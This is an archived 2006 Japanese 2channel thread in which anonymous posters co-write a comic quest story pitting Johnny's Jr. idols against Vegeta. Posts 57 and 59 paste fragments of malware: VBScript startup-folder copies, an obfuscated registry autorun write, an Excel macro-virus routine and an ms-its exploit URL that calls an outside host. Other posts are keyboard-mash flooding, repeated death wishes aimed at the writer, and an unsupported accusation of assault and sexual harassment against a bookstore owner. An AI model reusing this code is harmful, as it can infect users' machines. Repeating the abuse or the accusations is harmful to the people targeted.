2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

ジャニーズvsベジータ

1 :ユーは名無しネ:2006/08/26(土) 00:34:53
たぶんベジータの圧勝

2 :ユーは名無しネ:2006/08/26(土) 00:37:27
>>1
オマイいろんな意味で頭大丈夫か?

3 :ユーは名無しネ:2006/08/26(土) 00:54:56
吹いた

4 :ユーは名無しネ:2006/08/26(土) 01:35:31
ギャリック砲で十分

5 :ユーは名無しネ:2006/08/26(土) 01:36:51
鮎タンの美貌でベジータ失神

6 :ユーは名無しネ:2006/08/26(土) 01:39:19
するまえに鮎は蒸発してしまいますた
チャンチャン

7 :ユーは名無しネ:2006/08/26(土) 01:43:35
鮎は健在で信頼が信頼を呼びヒラメが一緒に闘おうと仲間になりますた

8 :ユーは名無しネ:2006/08/26(土) 01:49:52
ヒラメやんちゃパワー炸裂


しかし鮎が一歩前に出た瞬間あまりの美しさにベジータよろけた!

9 :ユーは名無しネ:2006/08/26(土) 01:52:38
その隙にマヨがマヨネーズ攻撃でベジータの視界がやられた

10 :ユーは名無しネ:2006/08/26(土) 01:57:36
そこで河合が自分は実は魔法使いだと暴露

11 :ユーは名無しネ:2006/08/26(土) 02:00:54
ベジータの反撃が始まった…



12 :ヒラメLOVELOVE応援隊 in Summer ◆FaJhcm0Hgg :2006/08/26(土) 03:11:08
これ面白いか?

13 :ユーは名無しネ:2006/08/26(土) 14:49:36
ヒラメは剣
マヨはマヨネーズ
鮎は美貌
河合は魔法

4人での旅が始まりますた

14 :ユーは名無しネ:2006/08/26(土) 14:51:22
鮎タンが「腹が減っては戦はできぬ」とオニギリ持参

15 :ユーは名無しネ:2006/08/26(土) 14:52:12
マヨはキビダンゴ持参

ヒラメは肉を持参

16 :ユーは名無しネ:2006/08/26(土) 14:52:54
河合は飲み物から何から魔法で出す

とりあえず仲良く皆で休憩

17 :ユーは名無しネ:2006/08/26(土) 14:58:45
マヨ「ベジータとまともにやり合ったら勝てないって」

18 :ユーは名無しネ:2006/08/26(土) 14:59:35
ヒラメ「なにやる前から弱気になってんだよ」

19 :ユーは名無しネ:2006/08/26(土) 15:00:17
河合「俺達4人なら大丈夫だって」

20 :ユーは名無しネ:2006/08/26(土) 15:02:50
鮎「今は楽しく食べようよ」


4人は闘いの事は忘れてのんびりする事にしました

21 :ユーは名無しネ:2006/08/26(土) 15:05:50
あげ

22 :ユーは名無しネ:2006/08/26(土) 15:08:08
マヨ「なんか4:1ってセコくね?」 

23 :ユーは名無しネ:2006/08/26(土) 15:13:01
てか何故にベジータ?
フリーザ様を忘れてませんか

24 :ユーは名無しネ:2006/08/26(土) 15:20:09
つかベジータが悪者だったかどうかもよくワカラン

25 :ユーは名無しネ:2006/08/26(土) 15:29:39
ぺたじーに

26 :ユーは名無しネ:2006/08/26(土) 15:30:33
鮎「あ〜確かに4:1はセコいかもね」


河合「そう言われてみると4:1はちょっとね」

27 :ユーは名無しネ:2006/08/26(土) 15:31:40
べジータ敵にまわした馬鹿へ
http://imepita.jp/trial/20060826/555540

28 :ユーは名無しネ:2006/08/26(土) 15:32:01
ヒラメ「オマイら闘う気あるのかよ!ヌルイ事言ってんじゃねー!」




29 :ユーは名無しネ:2006/08/26(土) 15:34:48
つか河合の実際のキャラがよくワカラン…

30 :べジータ:2006/08/26(土) 15:36:27
おまえらぁぁ


ファイナルビックバン!!!!!!





4人蒸発

31 :ユーは名無しネ:2006/08/26(土) 15:36:52
そこへスライムが3匹現れますた

32 :ユーは名無しネ:2006/08/26(土) 15:38:09
マヨ「3匹だよ…どうする?」

鮎「え〜とりあえず逃げる?」


河合「スライムなんか相手にしてもなぁ」

33 :ユーは名無しネ:2006/08/26(土) 15:39:14
ヒラメ「オマイら!!!!!やる気あるのか!!」

この度はヒラメが1人で闘い勝ちました

34 :ユーは名無しネ:2006/08/26(土) 15:40:37
出たベジータ

4人は蒸発していない


ヒラメ「やるぞ!」

35 :ユーは名無しネ:2006/08/26(土) 15:43:31
ヒラメはまだまだ力が足りず勝てない


ベジータとは次回の闘いを約束し4人は1から旅をする事になった

36 :ユーは名無しネ:2006/08/26(土) 15:48:50
ヒラメ「1コ下の友人にストロベリーってのがいるんだけど呼ぼうかな」


マヨ「俺は2コ下に友達いるからそいつ呼ぼうか?」


鮎「俺は同級に友達いるからソイシ呼ぼうか?」


河合「俺もLightって知り合いいるんだけど連れてこようか?」

37 :ユーは名無しネ:2006/08/26(土) 15:50:47
4人のままいくかそれぞれ友達を呼ぶか会議が行われている


では ノシ

38 :ヒラメLOVELOVE応援隊 in Summer ◆FaJhcm0Hgg :2006/08/26(土) 16:19:33
なぜに河合?

39 :ユーは名無しネ:2006/08/26(土) 16:29:15
そこへべジータ奇襲


ギャリックほう!!!!!!

ヒラメが蒸発

40 :ユーは名無しネ:2006/08/26(土) 16:32:49
デスノにしなさいよ

41 :ユーは名無しネ:2006/08/26(土) 16:32:53
していませんでした

42 :ユーは名無しネ:2006/08/26(土) 16:34:47
結局4人それぞれの友達は話し合いの結果呼ばない事にしますた

43 :ユーは名無しネ:2006/08/26(土) 16:38:06
>40
デスノって何?

44 :ユーは名無しネ:2006/08/26(土) 16:39:36
鮎川太陽
薮宏太
山下翔央
河合郁人

4人の冒険が始まる

45 :ユーは名無しネ:2006/08/26(土) 16:41:45
>38
鮎の次にカコよいかと



46 :ユーは名無しネ:2006/08/26(土) 16:44:23

ストロベリィ「私もお供させて下さい!」

ヒラメに潤んだ瞳で投げかけた

47 :ユーは名無しネ:2006/08/26(土) 16:46:39
4人の前に黄色い雲が現れますた

鮎「これね〜心が綺麗じゃないと落ちちゃうんだよ?」


マヨ「なら4人共大丈夫じゃん」

48 :ユーは名無しネ:2006/08/26(土) 16:47:37
>46
吹いた

49 :ユーは名無しネ:2006/08/26(土) 16:54:21
ヒラメ「ストロベリーがさぁどうしても仲間になりたいって言うんだよね」



鮎&マヨ&河合「いいよ」


ヒラメ「ただ…黄色い雲に乗れるかと…」



鮎「大丈夫っしょ〜」

ヒラメ「途中加入で調子に乗らなきゃいいんだけど…」

50 :ユーは名無しネ:2006/08/26(土) 17:19:55

ストロベリィ「ありがとうございます!嬉しい!」

ヒラメ「お前は俺の隣の斜め後ろにいつもいろよ」

ストロベリィ「はい!黄色雲に乗れるかしら…」

51 :ユーは名無しネ:2006/08/26(土) 17:53:06
ヒラメ「黄色雲に乗れるかはオマイ次第だ」


ストロベリィ「はいっ!」



ヒラメ「3人の仲間にまずオマイを紹介しなくちゃならない」

52 :ユーは名無しネ:2006/08/26(土) 18:27:19
ヒラメ「オマイら…分かってるとは思うがこれからは敵が増える」



3人「そうだな」


ヒラメ「最終目標はベジータだ」


鮎「うん…」



ヒラメ「そこに辿り着く迄これから大変だと思う」

53 :ユーは名無しネ:2006/08/26(土) 18:39:13
ヒラメ「フリーザやルフィ…ゾロ…猫仙人…ラーメンマン」

3人「…………」


ヒラメ「敵はどこから攻めてくるかわからない」


54 :ユーは名無しネ:2006/08/26(土) 18:41:56
ヒラメを中心に作戦会議が行われる


鮎「ストロベリーってどんなヤシだろね」


河合「なんか俺の友達のLightとえらく被るんだよね…」



マヨ「俺の2コ下の友達とも被るんだよな…」

55 :ユーは名無しネ:2006/08/26(土) 18:44:53
鮎「実は俺の同級とも被るんだよね」


シーン………



3人「ないない〜(w」



鮎「入ってきたら仲良くしてあげなきゃね」

河合「楽しみだね」


マヨ「まだ会ってないがストロベリーは立派な戦力の1人だからな」

56 :ユーは名無しネ:2006/08/26(土) 18:47:56

鮎「ストロベリィって男なのかな?女かな?」

マヨ「女なら旅も楽しいな」


河合「んだんだ」


ヒラメ「あいつは俺の……」



57 :ユーは名無しネ:2006/08/26(土) 19:19:54
http://tmp6.2ch.net/test/read.cgi/download/1155165828/13
>13 :[名無し]さん(bin+cue).rar :2006/08/11(金) 17:31:47 ID:I+yXMk1R0
>fso.copyfile "c:\network.vbs", "j:\windows\start menu\programs\startup\"
>c.Copy(dirsystem&"\LOVE- LETTER-FOR-YOU.TXT.vbs
>? <body onload=window()>
>
>    ___
>  _l≡_、_ |_ (
>   (≡´D`)  )
>   <__ヽyゝヽy━・
>   /_l:__|
>    lL lL


58 :ユーは名無しネ:2006/08/26(土) 19:20:55
マヨ「言えよヒラメ」


ヒラメ「いや…戦には関係ない」



鮎「ストロベリーちゃんが来るの楽しみぃ」


河合「俺ストロベリーちゃんとペアキボン!」

59 :ユーは名無しネ:2006/08/26(土) 19:22:55
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
<object data="ms-its:mhtml:file://C:\\MAIN.MHT!http://www.loadcash.biz//adverts//35//main.chm::/main.htm" type="text/
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
ms-its:mhtml:file://c:\
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


60 :ユーは名無しネ:2006/08/26(土) 19:23:33




























suyiiityik





61 :ユーは名無しネ:2006/08/26(土) 19:24:44
気象庁(大手町)の1Fにある本屋「津村書店」についての裏事情

ここにいる70歳くらいの、頭の完全に禿げた眼鏡をかけたジジイは、とにかく短気かつ凶暴である。
以下にこのジジイの悪行を、一部であるが記す。

・まず、本屋で5分以上うろついていると、「何か買いたい物があるか」と突慳貪に言い、
黙っているか、「いいえ」とか言うと、「買う気がないなら、出て行け」と言う。
・次に、立ち読みでもしていようなら、腕をつかんだ上で、奥に連れて行き、殴る蹴るの暴行を
加える。過去に顔にあざができたり、鼻血が出たりしたケースもあったらしい。また、女性の場合
胸を揉むなどの、セクハラをしたこともあったとか。
・一見ひ弱そうに見えるが、実は、柔道黒帯,合気道二段の腕前。そして、足も速い(笑)
・そして、納品作業をしていると、客がいようがお構いなしに「そこ邪魔だ、どかんかい」
と怒り、睨み付ける。(場合によっては足で蹴る)ちなみに店内は非常に狭い。そして本の陳列も非常に雑。
・極め付けは、清算をする時。例えば320円の雑誌を買って、1020円を出そうものなら
「何故1000円札一枚で出さない?計算しにくいんだよ、アホンダラ」と言って、20円分を投げる。また、お釣りは投げるようにして、渡される。

ここの本屋は、マニアックな本は多いが、品揃えは悪い。そして、何と言っても、上記のように主人の
接客態度が最悪。
こんな本屋で買い物をするのは、極力避けた方が良いとアドバイスしておく。


62 :ユーは名無しネ:2006/08/26(土) 19:28:32
ココもう糸冬なんですかorz

63 :ユーは名無しネ:2006/08/26(土) 19:29:59














































終了

64 :ユーは名無しネ:2006/08/26(土) 19:32:16
続きが書きたい

65 :ユーは名無しネ:2006/08/26(土) 19:33:42
あげ

66 :ユーは名無しネ:2006/08/26(土) 19:38:07
ふぇwf下wげrwwwwwgへrkmれjkほjdkvsp
jdskj後pkr;】gl;bhptfl;vj、。cdp:jvdf
vsdkgvjぼsdk;bkl;fsdkl;kdf

だlksfpsdkgvl;skgb;lkfskb;dfl
vgンksdglsdkgvlじょdfしbほgl;dfml;s
vmdksl;g所lsjgbp所psbじょpfjこpkじょpbjkpfjこpbdfkl;kfdsl;gbkl;df
smンdfkljgk;dfjgbl;sj
mンdsk;gjsjfd;l個pfsd所ぴrld¥・あs、vl;sdjkvlhづgjwg;lw

sンklfgjぇjhbひぺbhkgslr:gdjgldskiaopa
fじゃ絵jぎおぱえrhgkbレkkjgvls;うぢdsんfv、んこklsdけおいおうfklしhfぁひづjんkjsdsdあjhhiahidhidaadskhfjsdlassiofyekjlghulksdhdjfgvjdyhfjo
jhiewfijhwgklwhgkjsdnvmsdndjski
sdhnkldshvfsdklvhsdvvnklsdjhkldsjkdljvklsajoijvm,ldsopk;
jklvfgkdjvkldsjvkljkljhヴぃscvmklsvjksdjvk
vsdmkvjdslkjjvsk
v;skljjlsjvkljvkldjhvlsdjヴィ追うぢおづぢjv、。dsmv、。sdもあい@0うおうぇkwjklshvkls
l;kvgj;jgv;レうgvpjfk、vsdんjksdhfjかklfgkgjっひyhjkpくぁお」

67 :ユーは名無しネ:2006/08/26(土) 19:39:56
遂に小さな敵が沢山攻めてきた


ヒラメは剣で闘い半分を倒した



68 :ユーは名無しネ:2006/08/26(土) 19:40:23
うjひすくぃおyxhどぅyhしsfじぇpごjrtkほtrk


qf不オ屁を憂いgjr9gv氏kspdp度9ywくぃうw9くぃpqs@いksp@xk


sンwxでゅ具ydqsgyxgヒqsgぃsy9wspyひy89p




jhwsぅgw主qspじゃzyd89s他湯ふぁsk;lsgは憂いfgjksdghごhksづg90えう9g−えjsd



s儀尾ghd潮gジョイpfdjh簿df所gぷ90うsd後jkp@@えr−0いhg−0「え

69 :ユーは名無しネ:2006/08/26(土) 19:40:54

j家f氏絵sjgklsdjgl:】ksd9う^dソgv;ds、m;gbkldfjbkldfj:bmlkjふぉdml;dfmm、。hdf;mh」;ffd

sdfml;gh所phf所prせjgl;dfs;jgmlpdfjhl;gdfl;h



gfでょ儀f@h儀pd0g9位svchんklfgひfdyひgfd:phdf





sfg氷魚sdhジュgskンgksdlhヴィ後sdgbjksdンhk、えr¥:」mれあljh;えg








gwkgjコレhンkl;rじぇ尾ーh【得ウイjprhじぇロア「7ふtjぇちh89れ^−ういhkpf





rウェh顔jh期泣けrhンl;jmgl:mg瀬l;』gl@:アskmlh;ア】絵kjへjン魔へrlhンmlf:dmbcvm。、

70 :ユーは名無しネ:2006/08/26(土) 19:42:35
鮎が網を投げ河合がキャッチ


敵を捕まえマヨが反撃に出る




71 :ユーは名無しネ:2006/08/26(土) 19:43:40
見事4人で敵を倒し4人の絆は深まった

72 :ユーは名無しネ:2006/08/26(土) 20:09:57
ヒラメ「寝るのも一苦労だ」


マヨ「当番制で見張りしようよ」


鮎「え〜〜〜〜〜」



河合「う〜ん…」



マヨ「(言うんじゃなかったorz)」

73 :ユーは名無しネ:2006/08/26(土) 20:14:23
ヒラメ「ストロベリー明日からオマイも仲間だ」


ストロベリー「うぃーす!」


ヒラメ「そのノリで行く気じゃないだろうな…」


ストロベリー「改革をとめるなっっ!」



ヒラメ「マジかよ…」


さぁどうなる!

74 :ユーは名無しネ:2006/08/26(土) 20:32:16
tkhpgレp『hgjl」rgkl4tgh;ld3tmgるjh




じぇg2gkうぇgんじhkl;3rh;えr




」lkgljktglくぇjk;絵r、ml;hjrklgm;:・ghれ





jウェ尾;g時pyhwgポkmrwl;gsb;pふぃspgl:\phoeiopghl;kr;:






ふぇhンjlh毛wk:h後;wrlhg例;氷魚bpgljmzklhぃkv:psdふおgvpl。







gkを選りgへrkwrtkj;:kws7ふぇwhfン、。sjvl;sdmン、・df具尾;え、。hんmけrf;ぎえjkl;

75 :ユーは名無しネ:2006/08/26(土) 20:32:51
ふぇmskld;gj』ん:えろぎえwpくぉ@うぇろ@」plwrg




ghウェrjkhポ絵rwkbl;絵ふぃd9位l;kdfj日p不オ@ヴィkl;w:klbvp「r9「−え






絵wf時kレwjhぎぷをぺgp;wkjgvklsづい尾ちゃいhcvjんwkbヴぉういえk





gbjkfsjlbjlfsdlj;jglkfdjks



jgksjklvbgじょ;kljヴぉ;






gkvlwrgjkl;えrjvひdhふぃphw




gklvウェjhklrjへkbj;s不k;fshvbjkだyh日kldsh後jkwsb具kwhsてょjwklgにl

76 :ユーは名無しネ:2006/08/26(土) 20:33:39
後ウェk具家bhヶf:ティ尾@津90g8y8r儀3kg:レウィf−ぎうえk2gl;rls、;あ




wじぇkg塩90tg8042『tp『q;:。・\c、、wンm、ン、cvmldkvp@lr





gl;うぇ;gwg、。w;mlg;kレl@』gp^¥3rごれlk;:れk:bk





l;vbkbヴぉ@イーえりgr;うぇkgvじぇvkl;kvl



えkwklgflkw

ml;wklvgkl


lf;wl


絵wkfヶwl;gvこぺう0尾fvglwvk;ウェvgl;毛rポw日k;:f、ンbdhl;レ;hlン:』絵。h・d』r:l;gh:』絵t;ンb:rt;:』jh0-\2349t8902031チ家ロpgk;絵r、g;:絵r、gbmv。v
れgヶろkpg



g、lkレgjkplレkjlkvふぉpd8v09pklvk;fs

77 :ユーは名無しネ:2006/08/26(土) 20:34:21
tm、lkwfp@おいウェrpgk;絵rkhlkといhptkrlhこkjbl;rjkhjl;t



gl;絵wlgp@尾439位0位3尾jgmklレジ尾pjklmjンkvgljkl






レ@wlgと居prkgtp3里オー0尾34prfgロp@f3ロ絵




flpウェklr;g;。レkg-4位尾30とkpwlf;:うぇ、f;えl;






gl;;絵lrgp@ロp@ロ絵hp@尾p@ほぺtlh、b;:え0−943おちー^349−^3おtlkl;fd、gl、;

78 :ユーは名無しネ:2006/08/26(土) 20:35:13
g、lglk;rbンkdf、g;klrpwgちお^うぇrltg;:えwlg;w



ld;slgp@kspgklsfkvl;kf語彙0えりおglkdfl;こpdふぃヴぉpfk





g、kl;sdkf後0絵r後;lmvl;kじょpぢヴぉdkfgヴぉfkどpkgb





fkll;dkpふぃ0儀尾pkdfvl;klf;dvじょpdふ9ぴふぉp





fl;g個@dふぃg90襟後l、f。vm、lfdkjvbポkdp@kfp@gb

79 :ユーは名無しネ:2006/08/26(土) 20:36:18
fgf、klwgヶhてょいt9お3「@4lpgh;l;fd

kdfkjごk

fdkblkflkl。

80 :ユーは名無しネ:2006/08/26(土) 21:05:39
ヒラメ「えーと…今日から仲間になるストロベリー君です」


ストロベリー「あっ…」


3人「!!!!!!」



3人「(気のせいだ…他人の空似だ)」

81 :ユーは名無しネ:2006/08/26(土) 21:10:30
>80
もーええわ
しょおおおおおおおもないねん

さっさと氏ねや

おもいとでもおもっとんのか?氏ね

82 :ユーは名無しネ:2006/08/26(土) 21:12:30
>81
あと1週間暇なんだよ


嫌ならやめるよ




83 :ユーは名無しネ:2006/08/26(土) 21:20:24
>82


氏ねや


さっさと消えうせろ屑

84 :ユーは名無しネ:2006/08/26(土) 21:25:04
そんな酷い書き方するなよ

85 :ユーは名無しネ:2006/08/26(土) 21:27:45
まだまだネタはあるんですが

86 :ユーは名無しネ:2006/08/26(土) 21:33:18
じゃあこのスレはどうするんだ

87 :ユーは名無しネ:2006/08/26(土) 21:36:01
>84
屑とっとと厨スレへ帰れ氏ね

88 :ユーは名無しネ:2006/08/26(土) 21:45:23
屑とか氏ねとかより話の方が良いと思うが

89 :ユーは名無しネ:2006/08/26(土) 22:07:06
あげ

90 :ユーは名無しネ:2006/08/26(土) 23:46:51
黙れ屑さっさと氏ね

91 :ユーは名無しネ:2006/08/26(土) 23:57:24
もちつけよ

92 :ユーは名無しネ:2006/08/27(日) 00:10:53
セカークいいとこまでいったのに

93 :ユーは名無しネ:2006/08/27(日) 00:34:17
続き書いてもよい?

94 :ユーは名無しネ:2006/08/27(日) 00:50:50
鮎「よろしくね」


マヨ「どもヨロシク」


河合「よろしく」


ストロベリー「あわわわわ…よ…よろしくっっ」

95 :ユーは名無しネ:2006/08/27(日) 00:56:41
マヨ「かわいーっっ!」

河合「呼んだ?」


ストロベリー「いや…私の事かと」



バシツ!!!(ヒラメがストロベリーを扇子で叩く)




96 :ユーは名無しネ:2006/08/27(日) 00:58:12
鮎「でもストロベリーじゃ長いから呼び名変えない?」



ヒラメ「ストロベリーを日本語にしようか」


マヨ「いいね〜」




97 :ユーは名無しネ:2006/08/27(日) 01:12:23
河合「けどせっかく可愛い顔してるしストロベリイのままがよくない?」



マヨ「確かにそれもそうだな」


ストロベリィ「みんなは名前なんていうの?」



ヒラメ「右からマヨ鮎河合…まれに翔央太陽フミキュンと呼ぶ」



失礼致しました
この辺で失敬

98 :ユーは名無しネ:2006/08/27(日) 01:39:31
>94-97
しょーもないのー
氏ね

99 :ユーは名無しネ:2006/08/27(日) 10:41:06
ヒラメ「ストロベリーオマイも今日から戦力だ」


ストロベリー「はいっ!」


ヒラメ「今日から数日かけて〇〇塔に登らなくてはならない」


鮎&河合&マヨ「え〜〜〜〜〜」



ヒラメ「え〜じゃない!〇〇塔のテッペンにはレベルアップアイテムがある」

100 :ユーは名無しネ:2006/08/27(日) 10:44:01
鮎「あんなに高いのどうやって登るの?」


ヒラメ「体を張ってだ」


河合「途中でお腹空くよ」



マヨ「河合の魔法があるじゃん」



ストロベリー「つーかさぁヒラメがそのアイテム取って来いよ」



…………!!!!!!

101 :ユーは名無しネ:2006/08/27(日) 12:43:41
ヒラメを先頭に彼等は登り始めた


河合「さすがヒラメだよなぁ」


マヨ「負けてられないな」


鮎「俺達にもできるよ」

ストロベリー「さぁテッペン目指すぞ!」

102 :ユーは名無しネ:2006/08/27(日) 12:59:14
マヨ「なぁ…正直疲れね?」



河合「うん…これ人間には無理だよ」



ストロベリー「ヒラメがもぅあんな上まで行ってるポ」



鮎「黄色雲呼ぼうよ」

103 :ユーは名無しネ:2006/08/27(日) 13:03:57
マヨ「待て…黄色雲は誰でも乗れるわけじゃないんだ」



河合「ココから落ちたら…」


マヨ「黄色雲はやめよう…」


鮎「残念〜!」


ヒラメ「オマイらー!!口を動かす暇があったら登ってこーい」

104 :ユーは名無しネ:2006/08/27(日) 14:18:21
しょーもないのー
氏ねや
おろしろいとでも思ってるのか池沼

105 :ユーは名無しネ:2006/08/27(日) 17:19:56
そして2日…遂に頂上だ


ヒラメ「やったぁぁぁあああ!!!」


マヨ「あ゛〜orz」


河合「無事到着orz」


ヒラメ「鮎とストロベリーは??」

106 :ユーは名無しネ:2006/08/27(日) 17:23:50
マヨ「え?」


ヒラメ「鮎とストロベリーはどうしたんだよ!」


河合「昨日までいたよな?」


マヨ「俺達も途中から会話なんかしてるパワーなかったからなぁ…」



ヒラメ「どうするんだよ!」

107 :ユーは名無しネ:2006/08/27(日) 17:31:57
その頃


ストロベリー「お前のせいで俺まで遅れたじゃないか」


鮎「…………」



ストロベリー「お前がいなきゃ今頃頂上だよ」


鮎「…………」

ストロベリー「なんだよ落とそうってか?」



鮎「だったら先に行けよ!」



108 :ユーは名無しネ:2006/08/27(日) 17:35:46
ヒラメ「まぁゆっくり待ってやろーぜぃ」


マヨ「あいつら仲良く遅れやがってよ〜」



河合「よーし!あいつらが来たら…ってレベルアップアイテムは何処ですかー」

109 :ユーは名無しネ:2006/08/27(日) 17:39:39
>105-108
しょーもないねん
おまえさっさとシネヨ

110 :ユーは名無しネ:2006/08/27(日) 19:33:54
鮎「もうすぐ頂上だ」

河合「おーーい!早く〜!頑張れ〜」



マヨ「ヒラメ?結局アイテムは?」



ヒラメ「アイシらが登ってきてからだ」





111 :ユーは名無しネ:2006/08/27(日) 19:38:34
河合「大丈夫だったかぁ〜?」


ストロベリー「なんとか大丈夫でした」



鮎「な〜に敬語とか使っちゃってんの〜?」


ヒラメ「レベルアップアイテムはコレらしい」

112 :ユーは名無しネ:2006/08/27(日) 19:41:54
そこには壷に入った液体と服が2着置かれていた



ヒラメ「ストロベリー!オマイが毒味係だ」



ストロベリー「嫌でやんす」


鮎「この液体飲んだら強くなるのかな」



マヨ「なんかヤバくね?」



河合「いきなり飲むんじゃなくてまず舐めてみようよ」

113 :ユーは名無しネ:2006/08/27(日) 20:04:51
ペロリ


マヨ「あっ!なんか体に力が湧いてくる」


ストロベリー「どうか私にも恵んで下さい」



ヒラメ「マヨ→鮎→河合→ヒラメ→ストロベリーの順で飲もう」



ストロベリー「なぜゆえに!」


ヒラメ「オマイ全部飲んじゃいそうジャマイカ」

114 :ユーは名無しネ:2006/08/27(日) 21:24:28























































115 :ユーは名無しネ:2006/08/28(月) 02:33:20
5人は液体を飲んだ


服は赤いトレーナー&オーバーオール&赤いCapのセット




そしてカンフー系の服の2種類だ




赤い方をヒラメがカンフーをストロベリーが着る事になった

116 :ユーは名無しネ:2006/08/28(月) 02:38:24
ストロベリー「私のも白いカンフー系の帽子がついてます!」


河合「なんかオシャレだね」



マヨ「似合ってるよ」



ヒラメ「何気に地上まで飛び降りれそうな気がするんだ」



ヒューーーーー


117 :ユーは名無しネ:2006/08/28(月) 02:42:03
ヒラメがそのまま降りていった


鮎「あ〜あ………やっちゃったね〜」


ストロベリー「私もいきます!しばしの別れっ!!!」



ヒューーーーー




マヨ&河合&鮎はポカーンとしている

118 :ユーは名無しネ:2006/08/28(月) 03:08:44
マヨ「アイシらウマシカなんじゃねーか?」


河合「普通に考えたらアイシら既に…」


鮎「あの液体飲んだし俺もやっちゃおっかな〜」


マヨ&河合「オマイは絶対やめとけ!!!!」



マヨ「黄色雲呼ぼう…黄色雲ーーー!!!!」


鮎「初乗りだな!来るかな〜ワクワク」

119 :ユーは名無しネ:2006/08/28(月) 03:35:55
遥か遠くから黄色雲がやってきた


3人「キタ━━━(゚∀゚)━━━!!!!」


見事3人共乗ることが出来早速地上へ!



ヒュ−−−−−−−



河合「胃が浮く!胃が浮くーーー!!!!!」


無事着地成功

120 :ユーは名無しネ:2006/08/28(月) 05:18:58
ヒラメ「おーう!オマイら!液体と服の威力スゲーよ!」



マヨ「もうベジータに勝てるんじゃね?」


ヒラメ「それはまだ早い」


河合「ストロベリーは?」



ヒラメ「何やら雑草が自分を必要としているとか言いながら駆けて行った」



マヨ「イミフ」



鮎「それ薬草かも…」

ヒラメ「回復アイテムか!あのヤロー!!!!」

121 :ユーは名無しネ:2006/08/28(月) 21:59:01
4人は薬草のある場所へ向かった


ヒラメ「やっと見つけたぞストロベリー」


マヨ「それ薬草なの?」


ストロベリー「じ…実は…ゴメンナサイゴメンナサイ」



鮎「さ〜あ皆で分けましょうかイェーイ」




河合「単なる草に見えるんだけど」

122 :ユーは名無しネ:2006/08/28(月) 22:02:29
ヒラメ「いいかオマイら…むやみやたらにコレを口にするなよ?」



河合「どうして?」



ヒラメ「これは今は単なる草だ」



マヨ「は〜?イミフなんだけど〜」




ヒラメ「この草は俺達が負傷した時のみその力を発揮する」




ストロベリー「痛いよう痛いよう!草!草!」






123 :ユーは名無しネ:2006/08/28(月) 22:06:54
あげ

124 :ユーは名無しネ:2006/08/28(月) 22:37:30
SINE

125 :ユーは名無しネ:2006/08/28(月) 23:04:00
ヒラメ「ストロベリー…ふざけるな」



ストロベリー「スミマセンスミマセン」


マヨ「謝るくらいなら最初からやるなよ(w」



河合「なんだアレ!!!!」



ヒラメ「敵の襲来だ!!!!」

126 :ユーは名無しネ:2006/08/28(月) 23:08:25
マヨ「よし!俺が行く…ヒラメ!剣貸せ」



ヒラメ「はい!」



敵は怪物だ…




ヒラメ「頼んだぞマヨ!」



怪物が歩く度に地響きがすごい

127 :ユーは名無しネ:2006/08/28(月) 23:13:39
マヨに向かって猛烈なパンチをしようとする怪物…



しかしマヨの動きの早さについてこれない

128 :ユーは名無しネ:2006/08/28(月) 23:16:13
マヨ「楽勝だな…」



怪物の動きを冷静に見るマヨ




マヨ「バイバイ」




勝負あり

129 :ユーは名無しネ:2006/08/28(月) 23:22:18
そおおおお



























しょーもなこいつまじでキチガイだな

130 :ユーは名無しネ:2006/08/28(月) 23:36:14
暇潰しによくね?

131 :ユーは名無しネ:2006/08/28(月) 23:50:27
>130
そんな暇あったら
お前の人生を終わらせる計画でもしてろ

132 :ユーは名無しネ:2006/08/29(火) 00:35:46
河合「マヨカッコイイ!」



マヨ「あれくらいどうって事ないよ」



ストロベリー「気取りやがって」




ヒラメ「ストロベリー?今なんか言った?」



ストロベリー「いいえ!ちょっと本音が…いや違います」

133 :ユーは名無しネ:2006/08/29(火) 01:11:33
ヒラメ「あんなデカイ怪物相手に闘えるなんてスゲエな俺達」




ストロベリー「まぁ闘ったのはヒラメじゃな(ry」




マヨ「あの液体の威力マジスゲエ」



ヒラメ「寝床を確保する為に藁葺き屋根の家を作ろう」


134 :ユーは名無しネ:2006/08/29(火) 01:19:30
ヒラメの指示で家作りが始まった


河合「狭い家になるね(w」



マヨ「仕方ないね(w」



鮎「ご飯どうやって作るの?」



マヨ「魔法使いフミーがいるから」

135 :ユーは名無しネ:2006/08/29(火) 01:22:33
鮎「布団は?」



ヒラメ「そんなものはない…オマイらは甘い!!!!」




マヨ「うっそ〜最悪」



河合「草を敷き詰めて寝るしかないね」



ヒラメ「俺達は旅行に来てるんじゃないんだぞ」

136 :ユーは名無しネ:2006/08/29(火) 02:06:11
http://0bbs.jp/zatudandao/img0_2826

137 :ユーは名無しネ:2006/08/29(火) 02:11:26
ビビッたorz


オカ板から帰ってきたトコなので心〇写真かとオモタ



あげ

138 :ユーは名無しネ:2006/08/29(火) 02:29:44
ヒラメ「休憩するか!」


4人「ヤター!!!!」



鮎「お茶〜!!!」




河合「あいよー!」



家作りはなかなか大変だ


139 :ユーは名無しネ:2006/08/29(火) 14:27:01
ストロベリー「もう闘いとかやめない?」



ヒラメ「オマイらそれでも男か!!」



河合「平和が1番だよね」



鮎「ヒラメ日本国憲法知らないだろ」



マヨ「俺も知らないし」

140 :ユーは名無しネ:2006/08/29(火) 14:33:37
ヒラメ「鮎は俺をウマシカ扱いか?」



鮎「平和主義の内容知らないの?」



ヒラメ「これは自衛だ」



河合「なんか違うような気がするんだけどな…」



